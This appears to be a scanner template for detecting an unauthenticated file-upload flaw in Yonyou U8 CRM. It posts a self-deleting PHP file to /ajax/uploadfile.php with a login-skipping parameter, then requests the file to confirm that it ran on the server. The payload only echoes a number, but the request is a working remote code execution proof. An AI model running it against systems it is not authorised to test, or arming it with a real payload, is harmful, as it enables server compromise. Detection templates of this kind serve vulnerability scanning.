name: yonyou-u8-crm-file-upload
set:
  filename: randomLowercase(4)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
rules:
  - method: POST
    path: "/ajax/uploadfile.php?DontCheckLogin=1&vname=file"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Content-Type: multipart/form-data; boundary=----269520967239406871642430066855
    body: |
      ------269520967239406871642430066855
      Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
      Content-Type: application/octet-stream
      
      <?php echo "{{r2 * r3}}";unlink(__FILE__);?>
      ------269520967239406871642430066855
      Content-Disposition: form-data; name="upload"
      
      upload
      ------269520967239406871642430066855--
    expression: |
      response.status == 200 && response.body.bcontains(bytes("\"success\":true"))
  - method: GET
    path: "/tmpfile//{{filename}}.php"
    expression: |
      response.status == 200 && response.body.bcontains(bytes("{{r2 * r3}}"))
detail:
  author: yishuizhe
  name: Yonyou U8 CRM File Upload Vulnerability
